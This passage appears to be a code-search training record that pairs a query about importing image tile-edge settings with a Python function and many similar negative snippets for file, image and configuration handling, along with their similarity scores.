pool = multiprocessing.dummy.Pool(self._processes)\n return pool.map(self._get_file, paths) # type: ignore", "def get_file_list(input_list):\n if not isinstance(input_list, Iterable) or isinstance(input_list, str):\n raise ArgumentTypeError('input_list must be iterable (and not string)')\n file_list = []\n for item in input_list:\n if os.path.isfile(item):\n 
file_list.append(os.path.abspath(item))\n elif os.path.isdir(item):\n for fname in os.listdir(item):\n path = os.path.join(item, fname)\n if os.path.isfile(path):\n file_list.append(path)\n else:\n raise OpenL3Error('Could not find {}'.format(item))\n\n return file_list", "def locations(self):\n return [part.file for part in self.iterParts() if part]", "def locations(self):\n return [part.file for part in self.iterParts() if part]", "def locations(self):\n return [part.file for part in self.iterParts() if part]", "def _path_files_format(self):\n\n correct_files = []\n\n for file in self.files:\n if not file.startswith(self.path):\n correct_files.append(os.path.join(self.path, file))\n else:\n correct_files.append(file)\n\n self.files = correct_files", "def get_all_test_files(*args, **kwargs):\n return atable.get_all_input_files(*args, **kwargs)", "def get_all_image_paths(self):\n image_paths, image_labels = [], []\n for directory_name, subdirectory_list, file_list in os.walk(self.root_directory):\n for file_name in file_list:\n if file_name.endswith(('.jpg',)):\n image_paths.append(os.path.join(directory_name, file_name))\n # Translates labels to 0-26 as recommended in the exercise description\n image_labels.append(ord(directory_name[-1]) - 97)\n return image_paths, image_labels", "def getpaths_fromdir(input_prefix_, directory_):\n path = os.path.join(input_prefix_, \"%s*\" % directory_, \"*\")\n return [tuple([directory_, path])]", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def find_reference_files():\n for root, _, files in os.walk(\"./tests/references/\"):\n for basename in fnmatch.filter(files, \"*.tex\"):\n yield os.path.join(root, basename)", "def file_path(self) -> Path:\n return self._input_file", "def get_paths(pattern):\n if not in_source_tree:\n pattern = '../' + pattern\n\n files = glob.glob(os.path.normpath(os.path.join(top_dir, pattern)))\n return files", "def get_train_files(self):\n train_dir = os.path.join(self.data_dir, \"train_{}\".format(self.patient_no))\n filenames = os.listdir(train_dir)\n interm = ((os.path.splitext(f)[0].split(\"_\"), os.path.join(train_dir, f)) for f in filenames)\n return [(int(p[0][0]), int(p[0][1]), int(p[0][2]), p[1]) for p in interm]", "def GetInputFilename(fname):\n if not indir or fname[:1] == '/':\n return fname\n for dirname in indir:\n pathname = os.path.join(dirname, fname)\n if os.path.exists(pathname):\n return pathname\n\n raise ValueError(\"Filename '%s' not found in input path (%s) (cwd='%s')\" %\n (fname, ','.join(indir), os.getcwd()))", "def paths(self, toNative=True):\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n return self.path(toNative=toNative).split(\";\")\n else:\n return [self.path(toNative=toNative)]", "def get_string_of_files_paths(self):\n to_return = \"\"\n for paths in self.__files_paths:\n if len(paths) != 0:\n to_return += paths + \" \"\n return to_return", "def orig_filepath_list(filename_list, src_path):\n orig_filepaths = list([])\n i = 0\n for filename in filename_list:\n orig_filepaths.append(src_path + filename_list[i])\n i += 1\n return orig_filepaths", "def get_filepaths(subject_name):\n file_paths = [] # List which will store all of the full filepaths.\n\n directory = \"../mathgenerator/funcs/\" + subject_name\n # Walk the tree.\n for root, directories, files in os.walk(directory):\n for filename in files:\n # Join the two 
strings in order to form the full filepath.\n filepath = os.path.join(root, filename)\n\n front_len = 24+len(subject_name)\n filename = filepath[front_len:-3]\n file_paths.append(filename) # Add it to the list.\n\n return file_paths", "def list_output_files(self):\r\n fname = self.__get_output_filename()\r\n return [fname] if fname else []", "def files(self):\r\n files = []\r\n for path in self.paths:\r\n if os.path.isdir(path):\r\n files.extend(glob.glob(os.path.join(path, f'*{self.ext}')))\r\n else:\r\n files.extend(glob.glob(path))\r\n return list(set(self.get_pattern(fname) for fname in files))", "def filepaths(self) -> Dict[str, 'BinPackageFile']:\n return self._get_package_files()" ]
[ "0.6970691", "0.6879517", "0.6868738", "0.6868052", "0.67055565", "0.6700424", "0.65872943", "0.657331", "0.6540866", "0.651123", "0.65038157", "0.65028954", "0.6485323", "0.6448438", "0.63885504", "0.6380545", "0.63705975", "0.63195634", "0.6316908", "0.63139904", "0.62974036", "0.6260034", "0.62238383", "0.6191406", "0.61830497", "0.617022", "0.6137567", "0.6127645", "0.6106573", "0.6082255", "0.60791814", "0.6072339", "0.6062113", "0.60572106", "0.6056539", "0.60417205", "0.60205656", "0.60100853", "0.5989413", "0.597538", "0.5973043", "0.5959975", "0.5951728", "0.59406066", "0.59112805", "0.5910649", "0.5899212", "0.5898601", "0.58910054", "0.58825684", "0.58637685", "0.58625793", "0.58552104", "0.5845008", "0.5837567", "0.5829635", "0.5826675", "0.5823743", "0.58236116", "0.58213264", "0.581845", "0.5817133", "0.58146304", "0.5797441", "0.57936513", "0.5786646", "0.57858926", "0.5780082", "0.5776415", "0.57761306", "0.5756162", "0.5751605", "0.5749819", "0.57495403", "0.57447475", "0.5739376", "0.5728577", "0.572449", "0.571961", "0.5718476", "0.5718468", "0.5718468", "0.5718468", "0.57139623", "0.5709991", "0.5709981", "0.5709464", "0.5701536", "0.57008594", "0.5693349", "0.5691373", "0.5691292", "0.5685575", "0.5682495", "0.5680487", "0.567487", "0.56733334", "0.5672085", "0.5668918", "0.5668874" ]
0.71486807
0
Import image settings (currently tile edge).
def update_tile_edge(path):
    zfile = os.path.splitext(path)[0] + '.zip'
    if zf.is_zipfile(zfile):
        with zf.ZipFile(zfile) as z:
            if 'settings.json' in z.namelist():
                x = z.read('settings.json').decode('utf-8')
                x = yaml.safe_load(x)
                set('tile_edge', x['tile_edge'])
    return get('tile_edge')
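The snippet above relies on names it does not define: zf (presumably zipfile imported as zf), yaml, and module-level set/get settings accessors. A self-contained sketch under those assumptions, with a plain dict standing in for the settings store:

import os
import zipfile
import yaml

_settings = {'tile_edge': None}

def update_tile_edge(path):
    # look for a sibling .zip archive next to the given file
    zfile = os.path.splitext(path)[0] + '.zip'
    if zipfile.is_zipfile(zfile):
        with zipfile.ZipFile(zfile) as z:
            if 'settings.json' in z.namelist():
                # settings.json is read as text and parsed (YAML is a superset of JSON)
                x = yaml.safe_load(z.read('settings.json').decode('utf-8'))
                _settings['tile_edge'] = x['tile_edge']
    return _settings['tile_edge']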
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def import_image(self, file: str) -> Any:\n pass", "def importImg(self):\n logger.info(\"import image \"+ str(self))\n file,types = QtWidgets.QFileDialog.getOpenFileName(self, 'Choose Image',\n BASE_DIR,\"Image files (*.jpg *.gif *.png)\")\n logger.debug(file)\n self.imageFile = file\n self.image.setPixmap(QtGui.QPixmap(file))\n self.image.adjustSize()", "def import_image(self, imfile):\n img = self._load_image(imfile)\n img = self._trim_margins(img)\n self._check_size(img)\n return img", "def load_image(self, **kwargs):\n ...", "def __init__(self, img, settings):\r\n self.img_orig = img\r\n self.settings = settings", "def get_settings(dataset: DS):\n if dataset == DS.ARTIFICIAL_BBOX:\n project_path = Path('data/artificial/')\n project_file = project_path / 'annotations.json'\n image_dir = 'images'\n _, annotations = create_color_classification(path=project_path, n_samples=50,\n size=(500, 500))\n\n anno = {str(project_path / image_dir / k): [f'{v}.jpg'] for k, v in annotations.items()}\n\n with open(project_file, 'w') as f:\n json.dump(anno, f)\n\n return Settings(project_path=project_path,\n project_file=project_file,\n image_dir=image_dir,\n label_dir='class_images',\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=30, label_height=30,\n n_cols=3)\n elif dataset == DS.ARTIFICIAL_VIDEO:\n project_path = Path('data/artificial/')\n project_file = project_path / 'annotations.json'\n image_dir = 'images'\n create_mot_ds(project_path, image_dir, 20, True)\n return Settings(\n project_path=project_path,\n project_file=project_file,\n image_dir=image_dir,\n im_width=200,\n im_height=200,\n result_dir='create_results',\n )\n elif dataset == DS.CIFAR10:\n cifar_train_p, cifar_test_p = get_cifar10(Path('data'))\n\n return Settings(project_path=Path('data/cifar10/'),\n project_file=cifar_test_p,\n image_dir='test',\n label_dir=None,\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=140, label_height=30,\n n_cols=2)\n\n elif dataset == DS.OXFORD102:\n flowers102_train_p, flowers102_test_p = get_oxford_102_flowers(Path('data'))\n\n return Settings(project_path=Path('data/oxford-102-flowers'),\n project_file=flowers102_test_p,\n image_dir='jpg',\n label_dir=None,\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=40, label_height=30,\n n_cols=7)\n\n elif dataset == DS.CUB200:\n cub200_train_p, cub200_test_p = get_cub_200_2011(Path('data'))\n\n return Settings(project_path=Path('data/CUB_200_2011'),\n project_file=cub200_test_p,\n image_dir='images',\n label_dir=None,\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=50, label_height=50,\n n_cols=7)\n else:\n raise UserWarning(f\"Dataset {dataset} is not supported!\")", "def list_image_import_opts():\n\n opts = copy.deepcopy(_image_import_opts)\n opts.extend(plugin_opts.get_plugin_opts())\n return [(g, copy.deepcopy(o)) for g, o in opts]", "def importAll(self, imdata = True, imlights = True, imaovs = True, imshaders = True, immaster = True, asset = '', searchAndReplace = ['',''] ):\n\t\tif immaster:\n\t\t\tself.importMasterSettings()\n\t\tif imlights and self.lightPath.exists:\n\t\t\tself.importLights( asset, searchAndReplace )\n\t\tif imaovs and self.aovsPath.exists:\n\t\t\tself.importAovs()\n\t\tif imshaders and self.shaderPath.exists:\n\t\t\tself.importShaders()\n\t\tif imdata and 
self.dataPath.exists:\n\t\t\tself.importData( asset, searchAndReplace )", "def importMasterSettings(self):\n\t\tpickleData = pickle.load( open( self.masterPath.path, \"rb\" ) )\n\t\tmaster = rlayer.RenderLayer( 'defaultRenderLayer' )\n\t\tmaster.makeCurrent()\n\t\tfor a in pickleData.keys():\n\t\t\ttry:\n\t\t\t\ta.v = pickleData[a]\n\t\t\texcept:\n\t\t\t\tcontinue", "def configure(self):\n self.data_batch_file = self.get_value_from_config('data_batch_file')\n self.batch_meta_file = self.get_value_from_config('batch_meta_file')\n self.has_background = self.get_value_from_config('has_background')\n self.num_classes = self.get_value_from_config('num_classes')\n self.converted_images_dir = self.get_value_from_config('converted_images_dir')\n if not self.converted_images_dir:\n self.converted_images_dir = self.data_batch_file.parent / 'converted_images'\n self.convert_images = self.get_value_from_config('convert_images')\n # create directory for storing images if it is necessary\n if self.convert_images and not self.converted_images_dir.exists():\n self.converted_images_dir.mkdir(parents=True)\n self.dataset_meta = self.get_value_from_config('dataset_meta_file')", "def load_image_custom(self, image_id):\n \n info = self.image_info[image_id]\n filePath = info[\"path\"]\n \n filename = os.path.basename(filePath)\n filePath = os.path.dirname(os.path.dirname(filePath))\n \n image = []\n image.append(self.read_image(filePath + \"/artery/\" + filename)[:,:,0]) # artery phase\n image.append(self.read_image(filePath + \"/portal/\" + filename)[:,:,0]) # portal-venous phase\n image.append(self.read_image(filePath + \"/delay/\" + filename)[:,:,0]) # delay phase\n image = np.transpose(image,(1,2,0))\n \n return image, filename", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def _create_default_setting(path):\n try:\n from configparser import ConfigParser\n except ImportError:\n from ConfigParser import ConfigParser # ver. 
< 3.0\n\n # instantiate\n config = ConfigParser()\n\n # update existing value\n config['Assets Paths'] = {\n 'background': 'assets\\\\images\\\\background.png',\n 'bullet': 'assets\\\\images\\\\bullet.png',\n 'bullet_red': 'assets\\\\images\\\\bullet_red.png',\n 'icon' : 'assets\\\\images\\\\RedInvader.png',\n\n 'ship': 'assets\\\\images\\\\Ship.png',\n 'ship_cr': 'assets\\\\images\\\\ShipCrushedRight.png',\n 'ship_cl': 'assets\\\\images\\\\ShipCrushedLeft.png',\n 'ship_cc': 'assets\\\\images\\\\ShipWhite.png',\n\n 'invadera1': 'assets\\\\images\\\\InvaderA1.png',\n 'invadera2': 'assets\\\\images\\\\InvaderA2.png',\n 'invaderb1': 'assets\\\\images\\\\InvaderB1.png',\n 'invaderb2': 'assets\\\\images\\\\InvaderB2.png',\n 'invaderc1': 'assets\\\\images\\\\InvaderC1.png',\n 'invaderc2': 'assets\\\\images\\\\InvaderC2.png',\n\n }\n config['castle'] = {\n 'castle_location': [\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 0, 0, 0, 1],\n ],\n 'start_x': 50,\n 'start_y': 500,\n 'column': 5,\n 'row': 5,\n 'block_l3': (9, 255, 14),\n 'block_l2': (27, 255, 30),\n 'block_l1': (114, 255, 133),\n }\n config['alien'] = {\n 'margin_width': 200,\n 'margin_height': 20,\n 'column': 'd',\n 'Row': 5,\n 'width_x': 10,\n 'width_y': 10,\n 'movement': 10,\n 'alien_column_config': r'{\"0\":{\"path1\":\"InvaderA1\",\"path2\":\"InvaderA2\"},\"1\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"2\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"3\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"},\"4\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"}}'\n }\n config['player 1'] = {\n 'margin': 20,\n 'speed': 3\n }\n\n with open(path, 'w') as configfile:\n config.write(configfile)", "def load_image(self, image_index):\n\t\t\timage_info = self.coco.loadImgs(self.image_ids[image_index])[0]\n\t\t\tpath = os.path.join(self.data_dir, 'images', self.set_name, image_info['file_name'])\n\t\t\treturn read_image_bgr(path)", "def initImages(self):\n pass", "def initImages(self):\n pass", "def initImages(self):\n pass", "def test_image_import(self):\r\n module_store = modulestore('direct')\r\n\r\n content_store = contentstore()\r\n\r\n # Use conditional_and_poll, as it's got an image already\r\n import_from_xml(\r\n module_store,\r\n 'common/test/data/',\r\n ['conditional_and_poll'],\r\n static_content_store=content_store\r\n )\r\n\r\n course = module_store.get_courses()[0]\r\n\r\n # Make sure the course image is set to the right place\r\n self.assertEqual(course.course_image, 'images_course_image.jpg')\r\n\r\n # Ensure that the imported course image is present -- this shouldn't raise an exception\r\n asset_key = course.id.make_asset_key('asset', course.course_image)\r\n content_store.find(asset_key)", "def __loadImage(self, parameters):\n # self.localConfigured = Settings.instance().readValue( key = 'Common/local-repo' )\n for pr in parameters:\n if pr['type'] == 'image':\n if pr['value'].startswith('undefined:/'):\n fileName = pr['value'].split('undefined:/')[1]\n if not os.path.exists( fileName ):\n raise Exception(\"the following image file is missing: %s \" % fileName)\n\n file = QFile(fileName)\n if not file.open(QIODevice.ReadOnly):\n raise Exception(\"error opening image file %s\" % fileName )\n else:\n imageData= file.readAll()\n pr['value'] = \"undefined:/%s\" % base64.b64encode(imageData)\n elif pr['value'].startswith('local-tests:/'):\n fileName = pr['value'].split('local-tests:/')[1]\n\n if not os.path.exists( fileName ):\n raise Exception(\"the following image file is 
missing: %s \" % fileName)\n \n file = QFile(fileName)\n if not file.open(QIODevice.ReadOnly):\n raise Exception(\"error opening image file %s\" % fileName )\n else:\n imageData= file.readAll()\n pr['value'] = \"local-tests:/%s\" % base64.b64encode(imageData)\n else:\n pass", "def import_data(self, img_size):\n path = self._path\n images = []\n labels = []\n\n categs_name = [filename for filename in os.listdir(path)]\n for categ in categs_name:\n if isdir(join(path, categ)):\n\n for img_name in os.listdir(join(path, categ)):\n\n if \".jpg\" in img_name:\n\n img_name = self.correct_filename(img_name, categ)\n img_path = join(path, categ, img_name)\n img = cv2.imread(img_path)\n\n if img_size:\n dim = (img_size, img_size)\n try:\n img = cv2.resize(img, dim)\n except:\n print(img_name, \"has not been loaded.\")\n continue\n\n images.append(img)\n labels.append(categ)\n\n X = np.array(images)\n y = self.transform_labels(labels)\n\n return X, y", "def load_image(self, filename, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image(self, filename, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def _load(f, as_gray=False):\n # importing io is quite slow since it scans all the backends\n # we lazy import it here\n from skimage.io import imread\n return imread(os.path.join(data_dir, f), plugin='pil', as_gray=as_gray)", "def load(self):\n # copy defaults\n self.config = dict(**self.DEFAULTS)\n # read configuration\n savedconfig = Blender.Registry.GetKey(self.CONFIG_NAME, True)\n # port config keys from old versions to current version\n try:\n self.config[\"IMPORT_TEXTURE_PATH\"] = savedconfig[\"TEXTURE_SEARCH_PATH\"]\n except:\n pass\n try:\n self.config[\"IMPORT_FILE\"] = Blender.sys.join(\n savedconfig[\"NIF_IMPORT_PATH\"], savedconfig[\"NIF_IMPORT_FILE\"])\n except:\n pass\n try:\n self.config[\"EXPORT_FILE\"] = savedconfig[\"NIF_EXPORT_FILE\"]\n except:\n pass\n try:\n self.config[\"IMPORT_REALIGN_BONES\"] = savedconfig[\"REALIGN_BONES\"]\n except:\n pass\n try:\n if self.config[\"IMPORT_REALIGN_BONES\"] == True:\n self.config[\"IMPORT_REALIGN_BONES\"] = 1\n elif self.config[\"IMPORT_REALIGN_BONES\"] == False:\n self.config[\"IMPORT_REALIGN_BONES\"] = 0\n except:\n pass\n try:\n if savedconfig[\"IMPORT_SKELETON\"] == True:\n self.config[\"IMPORT_SKELETON\"] = 1\n elif savedconfig[\"IMPORT_SKELETON\"] == False:\n self.config[\"IMPORT_SKELETON\"] = 0\n except:\n pass\n # merge configuration with defaults\n if savedconfig:\n for key, val in self.DEFAULTS.iteritems():\n try:\n savedval = savedconfig[key]\n except KeyError:\n pass\n else:\n if isinstance(savedval, val.__class__):\n self.config[key] = savedval\n # store configuration\n Blender.Registry.SetKey(self.CONFIG_NAME, self.config, True)\n # special case: set log level here\n self.update_log_level(\"LOG_LEVEL\", self.config[\"LOG_LEVEL\"])", "def load_image():\n # pylint: disable=global-statement\n global current_frame, current_loop, frame_count, frame_duration, bitmap\n while sprite_group:\n sprite_group.pop()\n\n filename = SPRITESHEET_FOLDER + \"/\" + file_list[current_image]\n\n bitmap = displayio.OnDiskBitmap(filename)\n ### Change the palette value proportional to BRIGHTNESS\n bitmap.pixel_shader[1] = image_brightness(brightness)\n sprite = displayio.TileGrid(\n bitmap,\n pixel_shader=bitmap.pixel_shader,\n tile_width=bitmap.width,\n tile_height=matrix.display.height,\n )\n\n 
sprite_group.append(sprite)\n\n current_frame = 0\n current_loop = 0\n frame_count = int(bitmap.height / matrix.display.height)\n frame_duration = DEFAULT_FRAME_DURATION", "def import_image():\n img = cv2.imread(\"resources/lena.png\")\n\n cv2.imshow(\"Output\", img)\n cv2.waitKey(0)", "def load_image(self, image_id):\n \n # load image infos\n \n info = self.image_info[image_id]\n patch_path = info['path']\n width = info['width']\n height = info['height']\n impath = os.path.join(patch_path,\"images\")\n file_list = os.listdir(impath) \n channels = info['channels']\n \n image = []\n \n # stack channels to be loaded.\n \n for channel in channels:\n \n if channel == \"none\":\n channel_image = skimage.img_as_ubyte(np.zeros( (height,width) ) )\n \n else:\n channel_image_name = [x for x in file_list if channel in x][0] \n channel_image_path = os.path.join(impath, channel_image_name)\n channel_image = skimage.io.imread(channel_image_path)\n channel_image = skimage.img_as_ubyte(channel_image)\n image.append(channel_image)\n \n image = np.stack(image, axis=2)\n \n return image", "def setImage(*args):", "def load_minimap(self):\n minimap_types = ['cover', 'fog']\n self.game_data[\"minimap\"] = {\"fog\": None, \"cover\": None}\n file_name = self.game_data[\"file_name\"].split(\".json\")[0]\n for minimap_type in minimap_types:\n file_name = f\"{file_name}-{minimap_type}.png\"\n self.game_data[\"minimap\"][minimap_type] = pg.image.load(\n path.join(self.saved_minimap, file_name)).convert_alpha()\n logger.info(\"Load the minimap %s\", file_name)", "def change_img_pixel_format():\n\tbackground_module.bg = background_module.bg.convert()\n\tbackground_module.snow = background_module.snow.convert_alpha()\n\n\tforeground_module.ground = foreground_module.ground.convert_alpha()\n\t\n\tplayer_module.Player.imgs = [img.convert_alpha() for img in player_module.player.imgs]\n\tplayer_module.Propeller.propeller_imgs = [img.convert_alpha() for img in player_module.Propeller.propeller_imgs]\n\n\tcoins_module.Coin.resized_imgs = [img.convert_alpha() for img in coins_module.Coin.resized_imgs]\n\tcoins_module.coin_board = coins_module.coin_board.convert_alpha()\n\n\tobstacles_module.Tree.resized_imgs = [img.convert_alpha() for img in obstacles_module.Tree.imgs]\n\tobstacles_module.Rock_n_Bush.imgs = [img.convert_alpha() for img in obstacles_module.Rock_n_Bush.imgs]\t\n\n\teffects_module.Coin_spark_effects.imgs = [img.convert_alpha() for img in effects_module.Coin_spark_effects.imgs]\n\teffects_module.Hit_effects.imgs = [img.convert_alpha() for img in effects_module.Hit_effects.imgs]\n\n\tdisplay_module.heart = display_module.heart.convert_alpha()\n\tdisplay_module.line = display_module.line.convert_alpha()\n\tdisplay_module.start = display_module.start.convert_alpha()\n\tdisplay_module.finish = display_module.finish.convert_alpha()\n\tdisplay_module.fuel_bar.img_icon = display_module.fuel_bar.img_icon.convert_alpha()\n\n\tfor fuel in display_module.Fuel.fuel_list:\n\t\tfuel.img = fuel.img.convert_alpha()\n\tfor extra_life in display_module.Extra_life.extra_lives_list:\n\t\textra_life.img = extra_life.img.convert_alpha()\n\t\n\tdynamic_obstacle_giftbox.Gift.imgs_list = [img.convert_alpha() for img in dynamic_obstacle_giftbox.Gift.imgs_list]\n\tdynamic_obstacle_santa.Santa.imgs_list = [img.convert_alpha() for img in dynamic_obstacle_santa.Santa.imgs_list]\n\tdynamic_obstacle_olaf.Olaf.imgs_list = [img.convert_alpha() for img in dynamic_obstacle_olaf.Olaf.imgs_list]\n\tbird_module.Bird.list_of_lists = 
[[img.convert_alpha() for img in lst] for lst in bird_module.Bird.list_of_lists]", "def load(self, dirname):\n loaded_filenames = set()\n ini_filename = os.path.join(dirname, \"xpresser.ini\")\n if os.path.exists(ini_filename):\n config = ConfigParser.ConfigParser()\n config.read(ini_filename)\n for section_name in config.sections():\n if section_name.startswith(\"image \"):\n image_name = section_name.split(None, 1)[1]\n try:\n image_filename = config.get(section_name, \"filename\")\n except ConfigParser.NoOptionError:\n raise ImageDirError(\"Image %s missing filename option\"\n % image_name)\n image_filename = os.path.join(dirname, image_filename)\n if not os.path.exists(image_filename):\n raise ImageDirError(\"Image %s file not found: %s\" %\n (image_name, image_filename))\n try:\n image_similarity = config.getfloat(section_name,\n \"similarity\")\n except ConfigParser.NoOptionError:\n image_similarity = None\n except ValueError:\n value = config.get(section_name, \"similarity\")\n raise ImageDirError(\"Image %s has bad similarity: %s\"\n % (image_name, value))\n \n try:\n value = config.get(section_name, \"focus_delta\")\n match = CLICK_POSITION_RE.match(value)\n if not match:\n raise ImageDirError(\"Image %s has invalid click \"\n \"position: %s\" %\n (image_name, value))\n image_focus_delta = (int(match.group(\"x\")),\n int(match.group(\"y\")))\n except ConfigParser.NoOptionError:\n image_focus_delta = None\n image = Image(name=image_name,\n filename=image_filename,\n similarity=image_similarity,\n focus_delta=image_focus_delta)\n self._images[image_name] = image\n loaded_filenames.add(image_filename)\n\n # Load any other images implicitly with the default arguments.\n for basename in os.listdir(dirname):\n filename = os.path.join(dirname, basename)\n if filename not in loaded_filenames:\n ftype, fencoding = mimetypes.guess_type(filename)\n if ftype and ftype.startswith(\"image/\"):\n image_name = os.path.splitext(basename)[0]\n self._images[image_name] = Image(name=image_name,\n filename=filename)", "def load_image_i(self, img_tk):\n\n self.p2_label_img.configure(image=img_tk)\n self.p2_label_img.image = img_tk", "def load_image(self, index):\n image_path = os.path.join(self.folder_path, self.image_ids[index] + '.jpg')\n img = Image.open(image_path).convert('RGB')\n if debug:\n print(\"Loaded image: \", image_path)\n return img", "def load_images():\n print(\"[+] UPDATE - Begin loading images\")\n\n colors = [\"w\", \"b\"]\n piece_types = [\"p\", \"R\", \"N\", \"B\", \"K\", \"Q\"]\n for color in colors:\n for type in piece_types:\n piece = color + type\n IMAGES[piece] = p.transform.scale(p.image.load(\"images/\" + piece + \".png\"), (SQ_SIZE, SQ_SIZE))\n\n print(\"[+] UPDATE - Images loaded\")", "def restore_settings(self, plugin_settings, instance_settings):\n path = None\n try:\n path = instance_settings.value(\"output_directory\")\n except:\n pass\n self._set_output_directory(path)\n\n labels = None\n try:\n labels = instance_settings.value(\"labels\")\n except:\n pass\n #labels = self._read_labels()\n #self._set_labels(labels)\n self._create_service_client(str(instance_settings.value(\"service_name\", \"/image_recognition/my_service\")))\n self._create_subscriber(str(instance_settings.value(\"topic_name\", \"/xtion/rgb/image_raw\")))", "def import_images(site):\n image_bank = site['imagens']\n # look inside \"images\" folder and import all files\n path = os.path.dirname(os.path.abspath(__file__)) + '/browser/images/'\n logger.info(u'Importando imagens')\n for name in 
os.listdir(path):\n with open(path + name) as f:\n image = StringIO(f.read())\n img_name = name.split('.')[0]\n title = img_name.replace('-', ' ').title()\n api.content.create(\n image_bank,\n type = 'Image',\n id = name,\n title = title,\n description = u'Esta imagem é referenciada nos conteúdos do portal.',\n image = image,\n creators = CREATORS,\n )\n logger.debug(u' {0} importada'.format(name))", "def fill_import_section():\n section = _SectionData(\"Import\")\n section.props.append((\"ImportScale\", _property_utils.get_by_type(bpy.types.GlobalSCSProps.import_scale)))\n section.props.append((\"PreservePathForExport\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_preserve_path_for_export))))\n section.props.append((\"ImportPimFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pim_file))))\n section.props.append((\"UseWelding\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_use_welding))))\n section.props.append((\"WeldingPrecision\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_welding_precision))))\n section.props.append((\"UseNormals\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_use_normals))))\n section.props.append((\"ImportPitFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pit_file))))\n section.props.append((\"LoadTextures\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_load_textures))))\n section.props.append((\"ImportPicFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pic_file))))\n section.props.append((\"ImportPipFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pip_file))))\n section.props.append((\"ImportPisFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pis_file))))\n section.props.append((\"ConnectedBones\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_connected_bones))))\n section.props.append((\"BoneImportScale\", _property_utils.get_by_type(bpy.types.GlobalSCSProps.import_bone_scale)))\n section.props.append((\"ImportPiaFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pia_file))))\n section.props.append((\"IncludeSubdirsForPia\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_include_subdirs_for_pia))))\n return section", "def settings(args):\n data = {}\n data['train_x'] = load_pkl(os.path.join(args.data_dir, 'train_images.pkl'))\n data['train_y'] = load_pkl(os.path.join(args.data_dir, 'train_labels.pkl'))\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'valid_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, 'valid_labels.pkl'))\n if args.combine_train_val:\n data['train_x'].update(data['valid_x'])\n data['train_y'].update(data['valid_y'])\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'test_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, './data/bsd_pkl_float/test_labels.pkl'))\n args.display_step = len(data['train_x']) / 46\n # Default configuration\n if args.default_settings:\n args.n_epochs = 250\n args.batch_size = 10\n args.learning_rate = 3e-2\n args.std_mult = 0.8\n args.delay = 8\n args.filter_gain = 2\n args.filter_size = 5\n args.n_rings = 4\n args.n_filters = 7\n args.save_step = 5\n args.height = 321\n args.width = 481\n\n args.n_channels = 3\n args.lr_div = 10.\n args.augment = True\n args.sparsity = True\n\n args.test_path = args.save_name\n args.log_path = './logs'\n args.checkpoint_path = './checkpoints'\n\n make_dirs(args, 
args.test_path)\n make_dirs(args, args.log_path)\n make_dirs(args, args.checkpoint_path)\n\n return args, data", "def __load(self, node, path):\n\n self.firstgid = node['firstgid']\n self.margin = node['margin']\n self.spacing = node['spacing']\n\n # convierte la ruta de la imagen en una ruta relativa al proyecto\n directory = os.path.dirname(path)\n self.image_path = os.path.join(directory, *node['image'].split(r'\\/'))\n self.image_path = os.path.normpath(self.image_path)", "def parse_config():\n config_path = Path(\"config.ini\")\n if config_path.exists():\n config.read(config_path)\n else:\n config[\"database\"] = {\"location\": \"image-database.db\"}\n config[\"images\"] = {\"extensions\": \".jpeg,.jpg,.png,.gif,.tiff\"}\n with open(config_path, \"w\") as configfile:\n config.write(configfile)\n config.read(config_path)", "def ConfigureCustomImageSettings(cam_params, nodemap):\r\n\tprint('\\n*** CONFIGURING CUSTOM IMAGE SETTINGS *** \\n')\r\n\ttry:\r\n\t\tresult = True\r\n\t\twidth_to_set = cam_params[\"frameWidth\"]\r\n\t\theight_to_set = cam_params[\"frameHeight\"]\r\n\r\n\t\t# Set maximum width\r\n\t\t#\r\n\t\t# *** NOTES ***\r\n\t\t# Other nodes, such as those corresponding to image width and height,\r\n\t\t# might have an increment other than 1. In these cases, it can be\r\n\t\t# important to check that the desired value is a multiple of the\r\n\t\t# increment. However, as these values are being set to the maximum,\r\n\t\t# there is no reason to check against the increment.\r\n\t\tnode_width = PySpin.CIntegerPtr(nodemap.GetNode('Width'))\r\n\t\tif PySpin.IsAvailable(node_width) and 